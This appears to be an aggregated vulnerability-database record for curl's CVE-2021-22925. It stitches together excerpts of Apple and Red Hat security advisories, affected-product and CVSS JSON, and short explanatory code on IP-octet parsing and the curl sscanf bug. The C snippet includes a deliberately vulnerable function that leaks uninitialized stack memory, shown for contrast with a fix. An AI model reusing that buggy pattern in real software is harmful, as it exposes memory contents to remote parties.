- - Upgrade gatekeeper without the operator: The gatekeeper version is specified as part of the Gatekeeper CR in the gatekeeper operator policy. To upgrade the gatekeeper version:
a) Determine the latest version of gatekeeper by visiting: https://catalog.redhat.com/software/containers/rhacm2/gatekeeper-rhel8/5fadb4a18d9a79d2f438a5d9.
b) Click the tag dropdown, and find the latest static tag. An example tag is 'v3.3.0-1'.
c) Edit the gatekeeper operator policy and update the image tag to use the latest static tag. For example, you might change this line to image: 'registry.redhat.io/rhacm2/gatekeeper-rhel8:v3.3.0-1'.
Bugs fixed (https://bugzilla.redhat.com/):
2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic
2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2021-09-20-7 Additional information for APPLE-SA-2021-09-13-3 macOS Big Sur 11.6
macOS Big Sur 11.6 addresses the following issues.
CoreGraphics Available for: macOS Big Sur Impact: Processing a maliciously crafted PDF may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. Description: An integer overflow was addressed with improved input validation. CVE-2021-30860: The Citizen Lab
CUPS Available for: macOS Big Sur Impact: A local attacker may be able to elevate their privileges Description: A permissions issue existed. This issue was addressed with improved permission validation. CVE-2021-30827: an anonymous researcher Entry added September 20, 2021
CUPS Available for: macOS Big Sur Impact: A local user may be able to read arbitrary files as root Description: This issue was addressed with improved checks. CVE-2021-30828: an anonymous researcher Entry added September 20, 2021
CUPS Available for: macOS Big Sur Impact: A local user may be able to execute arbitrary files Description: A URI parsing issue was addressed with improved parsing. CVE-2021-22925 Entry added September 20, 2021
CVMS Available for: macOS Big Sur Impact: A local attacker may be able to elevate their privileges Description: A memory corruption issue was addressed with improved state management. CVE-2021-30832: Mickey Jin (@patch1t) of Trend Micro Entry added September 20, 2021
FontParser Available for: macOS Big Sur Impact: Processing a maliciously crafted dfont file may lead to arbitrary code execution Description: This issue was addressed with improved checks. CVE-2021-30841: Xingwei Lin of Ant Security Light-Year Lab CVE-2021-30842: Xingwei Lin of Ant Security Light-Year Lab CVE-2021-30843: Xingwei Lin of Ant Security Light-Year Lab Entry added September 20, 2021
Gatekeeper Available for: macOS Big Sur Impact: A malicious application may bypass Gatekeeper checks Description: This issue was addressed with improved checks. CVE-2021-30853: Gordon Long (@ethicalhax) of Box, Inc. Entry added September 20, 2021
ImageIO Available for: macOS Big Sur Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: This issue was addressed with improved checks. CVE-2021-30847: Mike Zhang of Pangu Lab Entry added September 20, 2021
Kernel Available for: macOS Big Sur Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2021-30830: Zweig of Kunlun Lab Entry added September 20, 2021
Kernel Available for: macOS Big Sur Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds read was addressed with improved input validation. CVE-2021-30865: Zweig of Kunlun Lab Entry added September 20, 2021
Kernel Available for: macOS Big Sur Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved locking. CVE-2021-30857: Zweig of Kunlun Lab Entry added September 20, 2021
Kernel Available for: macOS Big Sur Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A type confusion issue was addressed with improved state handling. CVE-2021-30859: Apple Entry added September 20, 2021
libexpat Available for: macOS Big Sur Impact: A remote attacker may be able to cause a denial of service Description: This issue was addressed by updating expat to version 2.4.1. CVE-2013-0340: an anonymous researcher Entry added September 20, 2021
Preferences Available for: macOS Big Sur Impact: An application may be able to access restricted files Description: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks. CVE-2021-30855: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com) Entry added September 20, 2021
Sandbox Available for: macOS Big Sur Impact: A user may gain access to protected parts of the file system Description: An access issue was addressed with improved access restrictions. CVE-2021-30850: an anonymous researcher Entry added September 20, 2021
SMB Available for: macOS Big Sur Impact: A local user may be able to read kernel memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2021-30845: Peter Nguyen Vu Hoang of STAR Labs Entry added September 20, 2021
SMB Available for: macOS Big Sur Impact: A remote attacker may be able to leak memory Description: A logic issue was addressed with improved state management. CVE-2021-30844: Peter Nguyen Vu Hoang of STAR Labs Entry added September 20, 2021
WebKit Available for: macOS Big Sur Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. Description: A use after free issue was addressed with improved memory management. CVE-2021-30858: an anonymous researcher
Additional recognition
APFS We would like to acknowledge Koh M. Nakagawa of FFRI Security, Inc. for their assistance. Entry added September 20, 2021
App Support We would like to acknowledge @CodeColorist, an anonymous researcher for their assistance. Entry added September 20, 2021
CoreML We would like to acknowledge hjy79425575 working with Trend Micro Zero Day Initiative for their assistance. Entry added September 20, 2021
CUPS We would like to acknowledge an anonymous researcher for their assistance. Entry added September 20, 2021
Kernel We would like to acknowledge Anthony Steinhauser of Google's Safeside project for their assistance. Entry added September 20, 2021
Sandbox We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive Security for their assistance. Entry added September 20, 2021
smbx We would like to acknowledge Zhongcheng Li (CK01) for their assistance. Entry added September 20, 2021
Installation note:
This update may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmFI888ACgkQeC9qKD1p rhi/Bg/9GiqXl8sxPjDpATJqneZ1GcAxWxBZgkFrcLV/cMwrVqniWsOeVHqHjMSY eJUkGehUtKsYE0g8Uk0qJqOUl3dxxGJpIDytOQJB3TFdd1BpZSK/tOChVem1JV1B +CMhqDnmR/u7bLqfCr1p6J5QJNHjTjgBA4RthdzZZ52pLGql7/2qfaJwpeHkheS4 5EKmch8zh0CGRqrUTg1HgY67ierNsz47jIU6n7UeMwjskRU3xM9VqJ9s4eKGAtSv 4Ry16pv0xUZ4cmL5EiLm2/eFbY8ByCji7jYPP0POBO4l518TGpaX2PaZBP9v0rrD t6cPEZHnsRaZ49OYak6z9iA8teKGSs6aCMuzSxExvlT8+YySf1o1nefbRH/tZMfn bwSO0ZyPsS9WYyuG/zX08U3CKOTkjqhLaOwVwte+cAeg2QS85aa9XPMG6PKcpyfu R7auxS92+Dg+R+97dAsI9TprSutCTw4iY8lyK9MVJSnh+zQSZEihUh4EaSufTHRC NlOSHvsTfXqsHaeed6sVKyX4ADHCUvRbCCIrqJKUs6waNd2T2XF7SzvgTSDJMHU9 4AL/jpnltTjDJTtMO999VZKNzYurrGiHvBs5zHWr91+eaHW8YGdsDERsX3BFYLe3 85i+Yge0iXlP7mT32cWxIw4AWDFITFiHnmV1/cdsCd2GIkqkhFw= =9bjT -----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: ACS 3.67 security and enhancement update
Advisory ID: RHSA-2021:4902-01
Product: RHACS
Advisory URL: https://access.redhat.com/errata/RHSA-2021:4902
Issue date: 2021-12-01
CVE Names: CVE-2018-20673 CVE-2019-5827 CVE-2019-13750 CVE-2019-13751 CVE-2019-17594 CVE-2019-17595 CVE-2019-18218 CVE-2019-19603 CVE-2019-20838 CVE-2020-12762 CVE-2020-13435 CVE-2020-14155 CVE-2020-16135 CVE-2020-24370 CVE-2020-27304 CVE-2021-3200 CVE-2021-3445 CVE-2021-3580 CVE-2021-3749 CVE-2021-3800 CVE-2021-3801 CVE-2021-20231 CVE-2021-20232 CVE-2021-20266 CVE-2021-22876 CVE-2021-22898 CVE-2021-22925 CVE-2021-23343 CVE-2021-23840 CVE-2021-23841 CVE-2021-27645 CVE-2021-28153 CVE-2021-29923 CVE-2021-32690 CVE-2021-33560 CVE-2021-33574 CVE-2021-35942 CVE-2021-36084 CVE-2021-36085 CVE-2021-36086 CVE-2021-36087 CVE-2021-39293
=====================================================================
- Summary:
Updated images are now available for Red Hat Advanced Cluster Security for Kubernetes (RHACS).
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
The release of RHACS 3.67 provides the following new features, bug fixes, security patches and system changes:
OpenShift Dedicated support
RHACS 3.67 is thoroughly tested and supported on OpenShift Dedicated on Amazon Web Services and Google Cloud Platform.
-
Use OpenShift OAuth server as an identity provider If you are using RHACS with OpenShift, you can now configure the built-in OpenShift OAuth server as an identity provider for RHACS.
-
Enhancements for CI outputs Red Hat has improved the usability of RHACS CI integrations. CI outputs now show additional detailed information about the vulnerabilities and the security policies responsible for broken builds.
-
Runtime Class policy criteria Users can now use RHACS to define the container runtime configuration that may be used to run a pod’s containers using the Runtime Class policy criteria.
Security Fix(es):
-
civetweb: directory traversal when using the built-in example HTTP form-based file upload mechanism via the mg_handle_form_request API (CVE-2020-27304)
-
nodejs-axios: Regular expression denial of service in trim function (CVE-2021-3749)
-
nodejs-prismjs: ReDoS vulnerability (CVE-2021-3801)
-
golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet (CVE-2021-29923)
-
helm: information disclosure vulnerability (CVE-2021-32690)
-
golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196) (CVE-2021-39293)
-
nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe (CVE-2021-23343)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
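The hazard behind CVE-2021-29923 listed above comes from leading zeros in an IP address octet: a parser that reads octets in decimal and a C-style, octal-aware parser disagree about the same string. A small sketch follows; the helper functions are local illustrations, not Go's net package API.

```python
# CVE-2021-29923 hazard, illustrated: "0127.0.0.1" is 127.0.0.1 to a
# parser that ignores leading zeros, but inet_aton-style parsers treat
# a leading 0 as octal, yielding 87.0.0.1. These helpers are invented
# for the sketch, not the Go standard library's actual functions.
def octet_decimal(s: str) -> int:
    # Leading zeros silently ignored, as pre-fix parsing did.
    return int(s, 10)

def octet_c_style(s: str) -> int:
    # C inet_aton semantics: a leading zero selects base 8.
    if len(s) > 1 and s.startswith("0"):
        return int(s, 8)
    return int(s, 10)

print(octet_decimal("0127"))  # 127
print(octet_c_style("0127"))  # 87
```

The mismatch matters when one component validates an address decimally and another component (or the OS resolver) later interprets it octally, so access-control decisions and the actual connection target can diverge.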
Bug Fixes The release of RHACS 3.67 includes the following bug fixes:
-
Previously, when using RHACS with the Compliance Operator integration, RHACS did not respect or populate Compliance Operator TailoredProfiles. This has been fixed.
-
Previously, the Alpine Linux package manager (APK) in Image policy looked for the presence of apk package in the image rather than the apk-tools package. This issue has been fixed.
System changes The release of RHACS 3.67 includes the following system changes:
- Scanner now identifies vulnerabilities in Ubuntu 21.10 images.
- The Port exposure method policy criteria now include route as an exposure method.
- The OpenShift: Kubeadmin Secret Accessed security policy now allows the OpenShift Compliance Operator to check for the existence of the Kubeadmin secret without creating a violation.
- The OpenShift Compliance Operator integration now supports using TailoredProfiles.
- The RHACS Jenkins plugin now provides additional security information.
- When you enable the environment variable ROX_NETWORK_ACCESS_LOG for Central, the logs contain the Request URI and X-Forwarded-For header values.
- The default uid:gid pair for the Scanner image is now 65534:65534.
- RHACS adds a new default Scope Manager role that includes minimum permissions to create and modify access scopes.
- If microdnf is part of an image or shows up in process execution, RHACS reports it as a security violation for the Red Hat Package Manager in Image or the Red Hat Package Manager Execution security policies.
- In addition to manually uploading vulnerability definitions in offline mode, you can now upload definitions in online mode.
- You can now format the output of the following roxctl CLI commands in table, csv, or JSON format: image scan, image check & deployment check
-
You can now use a regular expression for the deployment name while specifying policy exclusions
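As a rough illustration of matching deployment names against a regular expression for exclusion purposes (the pattern, deployment names, and matching semantics below are invented for the sketch; RHACS applies its own rules):

```python
import re

# Hypothetical sketch of excluding deployments by name with a regular
# expression. The pattern and deployment names are invented examples.
exclusion = re.compile(r"^debug-.*")
deployments = ["debug-probe", "payments", "debug-shell"]
excluded = [d for d in deployments if exclusion.match(d)]
print(excluded)  # ['debug-probe', 'debug-shell']
```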
-
Solution:
To take advantage of these new features, fixes and changes, please upgrade Red Hat Advanced Cluster Security for Kubernetes to version 3.67.
- Bugs fixed (https://bugzilla.redhat.com/):
1956818 - CVE-2021-23343 nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe
1978144 - CVE-2021-32690 helm: information disclosure vulnerability
1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet
1999784 - CVE-2021-3749 nodejs-axios: Regular expression denial of service in trim function
2005445 - CVE-2021-3801 nodejs-prismjs: ReDoS vulnerability
2006044 - CVE-2021-39293 golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196)
2016640 - CVE-2020-27304 civetweb: directory traversal when using the built-in example HTTP form-based file upload mechanism via the mg_handle_form_request API
- JIRA issues fixed (https://issues.jboss.org/):
RHACS-65 - Release RHACS 3.67.0
- References:
https://access.redhat.com/security/cve/CVE-2018-20673
https://access.redhat.com/security/cve/CVE-2019-5827
https://access.redhat.com/security/cve/CVE-2019-13750
https://access.redhat.com/security/cve/CVE-2019-13751
https://access.redhat.com/security/cve/CVE-2019-17594
https://access.redhat.com/security/cve/CVE-2019-17595
https://access.redhat.com/security/cve/CVE-2019-18218
https://access.redhat.com/security/cve/CVE-2019-19603
https://access.redhat.com/security/cve/CVE-2019-20838
https://access.redhat.com/security/cve/CVE-2020-12762
https://access.redhat.com/security/cve/CVE-2020-13435
https://access.redhat.com/security/cve/CVE-2020-14155
https://access.redhat.com/security/cve/CVE-2020-16135
https://access.redhat.com/security/cve/CVE-2020-24370
https://access.redhat.com/security/cve/CVE-2020-27304
https://access.redhat.com/security/cve/CVE-2021-3200
https://access.redhat.com/security/cve/CVE-2021-3445
https://access.redhat.com/security/cve/CVE-2021-3580
https://access.redhat.com/security/cve/CVE-2021-3749
https://access.redhat.com/security/cve/CVE-2021-3800
https://access.redhat.com/security/cve/CVE-2021-3801
https://access.redhat.com/security/cve/CVE-2021-20231
https://access.redhat.com/security/cve/CVE-2021-20232
https://access.redhat.com/security/cve/CVE-2021-20266
https://access.redhat.com/security/cve/CVE-2021-22876
https://access.redhat.com/security/cve/CVE-2021-22898
https://access.redhat.com/security/cve/CVE-2021-22925
https://access.redhat.com/security/cve/CVE-2021-23343
https://access.redhat.com/security/cve/CVE-2021-23840
https://access.redhat.com/security/cve/CVE-2021-23841
https://access.redhat.com/security/cve/CVE-2021-27645
https://access.redhat.com/security/cve/CVE-2021-28153
https://access.redhat.com/security/cve/CVE-2021-29923
https://access.redhat.com/security/cve/CVE-2021-32690
https://access.redhat.com/security/cve/CVE-2021-33560
https://access.redhat.com/security/cve/CVE-2021-33574
https://access.redhat.com/security/cve/CVE-2021-35942
https://access.redhat.com/security/cve/CVE-2021-36084
https://access.redhat.com/security/cve/CVE-2021-36085
https://access.redhat.com/security/cve/CVE-2021-36086
https://access.redhat.com/security/cve/CVE-2021-36087
https://access.redhat.com/security/cve/CVE-2021-39293
https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYafeGdzjgjWX9erEAQgZ8Q/9H5ov4ZfKZszdJu0WvRMetEt6DMU2RTZr Kjv4h4FnmsMDYYDocnkFvsRjcpdGxtoUShAqD6+FrTNXjPtA/v1tsQTJzhg4o50w tKa9T4aHfrYXjGvWgQXJJEGmGaYMYePUOv77x6pLfMB+FmgfOtb8kzOdNzAtqX3e lq8b2DrQuPSRiWkUgFM2hmS7OtUsqTIShqWu67HJdOY74qDN4DGp7GnG6inCrUjV x4/4X5Fb7JrAYiy57C5eZwYW61HmrG7YHk9SZTRYgRW0rfgLncVsny4lX1871Ch2 e8ttu0EJFM1EJyuCJwJd1Q+rhua6S1VSY+etLUuaYme5DtvozLXQTLUK31qAq/hK qnLYQjaSieea9j1dV6YNHjnvV0XGczyZYwzmys/CNVUxwvSHr1AJGmQ3zDeOt7Qz vguWmPzyiob3RtHjfUlUpPYeI6HVug801YK6FAoB9F2BW2uHVgbtKOwG5pl5urJt G4taizPtH8uJj5hem5nHnSE1sVGTiStb4+oj2LQonRkgLQ2h7tsX8Z8yWM/3TwUT PTBX9AIHwt8aCx7XxTeEIs0H9B1T9jYfy06o9H2547un9sBoT0Sm7fqKuJKic8N/ pJ2kXBiVJ9B4G+JjWe8rh1oC1yz5Q5/5HZ19VYBjHhYEhX4s9s2YsF1L1uMoT3NN T0pPNmsPGZY= =ux5P -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Summary:
The Migration Toolkit for Containers (MTC) 1.5.2 is now available. Description:
The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.
Security Fix(es):
- nodejs-immer: prototype pollution may lead to DoS or remote code execution (CVE-2021-3757)

- mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC) (CVE-2021-3948)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Solution:
For details on how to install and use MTC, refer to:
https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html
- Bugs fixed (https://bugzilla.redhat.com/):
2000734 - CVE-2021-3757 nodejs-immer: prototype pollution may lead to DoS or remote code execution 2005438 - Combining Rsync and Stunnel in a single pod can degrade performance (1.5 backport) 2006842 - MigCluster CR remains in "unready" state and source registry is inaccessible after temporary shutdown of source cluster 2007429 - "oc describe" and "oc log" commands on "Migration resources" tree cannot be copied after failed migration 2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC)
- Solution:
See the Red Hat OpenShift Container Platform 4.6 documentation at: https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless/index See the Red Hat OpenShift Container Platform 4.7 documentation at: https://access.redhat.com/documentation/en-us/openshift_container_platform/4.7/html/serverless/index See the Red Hat OpenShift Container Platform 4.8 documentation at: https://access.redhat.com/documentation/en-us/openshift_container_platform/4.8/html/serverless/index See the Red Hat OpenShift Container Platform 4.9 documentation at: https://access.redhat.com/documentation/en-us/openshift_container_platform/4.9/html/serverless/index
4
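The flaw tracked by this record (CVE-2021-22925, described in the detail data below) came from parsing a `name,value` telnet option with sscanf() without checking the conversion count, so an unmatched field left uninitialized stack bytes that were then sent to the server. The sketch below illustrates that bug class with hypothetical helper names; it is not curl's actual code.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Buggy pattern: parse "name,value" into stack buffers and ignore how many
 * conversions sscanf() actually performed. If `arg` has no ',', `value` is
 * never written, yet its (uninitialized) contents are still serialized. */
static size_t build_option_buggy(const char *arg, char *out, size_t outlen) {
    char name[128], value[128];
    sscanf(arg, "%127[^,],%127s", name, value);  /* BUG: return value unchecked */
    return (size_t)snprintf(out, outlen, "%s=%s", name, value);
}

/* Fixed variant: check the conversion count and fall back to empty strings,
 * so no uninitialized stack bytes can leak onto the wire. */
static size_t build_option_fixed(const char *arg, char *out, size_t outlen) {
    char name[128], value[128];
    int n = sscanf(arg, "%127[^,],%127s", name, value);
    if (n < 1) name[0] = '\0';
    if (n < 2) value[0] = '\0';
    return (size_t)snprintf(out, outlen, "%s=%s", name, value);
}
```

With the fixed variant, `"USER,alice"` serializes to `USER=alice`, while a lone `"USER"` yields `USER=` instead of whatever happened to be on the stack. (The buggy variant is shown only for contrast; calling it with a comma-less argument reads uninitialized memory.)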
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "11.0.1"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "eq",
"trust": 1.0,
"vendor": "splunk",
"version": "9.1.0"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "11.3"
},
{
"_id": null,
"model": "macos",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "11.3.1"
},
{
"_id": null,
"model": "sinema remote connect server",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.1"
},
{
"_id": null,
"model": "macos",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "11.4"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.6"
},
{
"_id": null,
"model": "sinec infrastructure network services",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "1.0.1.1"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.0"
},
{
"_id": null,
"model": "macos",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "11.1.0"
},
{
"_id": null,
"model": "mysql server",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.26"
},
{
"_id": null,
"model": "hci management node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "11.2.1"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "33"
},
{
"_id": null,
"model": "mysql server",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.7.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.0"
},
{
"_id": null,
"model": "macos",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "11.5"
},
{
"_id": null,
"model": "solidfire",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mysql server",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"_id": null,
"model": "macos",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "11.2"
},
{
"_id": null,
"model": "macos",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "11.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.12"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.58"
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.57"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.59"
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mysql server",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.7.35"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "curl",
"scope": "lt",
"trust": 1.0,
"vendor": "haxx",
"version": "7.78.0"
},
{
"_id": null,
"model": "mac os x",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "10.15.7"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "curl",
"scope": "gte",
"trust": 1.0,
"vendor": "haxx",
"version": "7.7"
},
{
"_id": null,
"model": "macos",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "11.1"
},
{
"_id": null,
"model": "apple mac os x",
"scope": null,
"trust": 0.8,
"vendor": "\u30a2\u30c3\u30d7\u30eb",
"version": null
},
{
"_id": null,
"model": "hci management node",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": null,
"trust": 0.8,
"vendor": "fedora",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": null,
"trust": 0.8,
"vendor": "\u30a2\u30c3\u30d7\u30eb",
"version": null
},
{
"_id": null,
"model": "mysql",
"scope": null,
"trust": 0.8,
"vendor": "\u30aa\u30e9\u30af\u30eb",
"version": null
},
{
"_id": null,
"model": "solidfire",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": null,
"trust": 0.8,
"vendor": "\u30aa\u30e9\u30af\u30eb",
"version": null
},
{
"_id": null,
"model": "sinec infrastructure network services",
"scope": null,
"trust": 0.8,
"vendor": "\u30b7\u30fc\u30e1\u30f3\u30b9",
"version": null
},
{
"_id": null,
"model": "ontap",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "curl",
"scope": null,
"trust": 0.8,
"vendor": "haxx",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-009763"
},
{
"db": "NVD",
"id": "CVE-2021-22925"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "165287"
},
{
"db": "PACKETSTORM",
"id": "166489"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "165862"
}
],
"trust": 0.6
},
"cve": "CVE-2021-22925",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2021-22925",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-381399",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"id": "CVE-2021-22925",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.3,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2021-22925",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-22925",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2021-22925",
"trust": 0.8,
"value": "Medium"
},
{
"author": "VULHUB",
"id": "VHN-381399",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381399"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-009763"
},
{
"db": "NVD",
"id": "CVE-2021-22925"
}
]
},
"description": {
"_id": null,
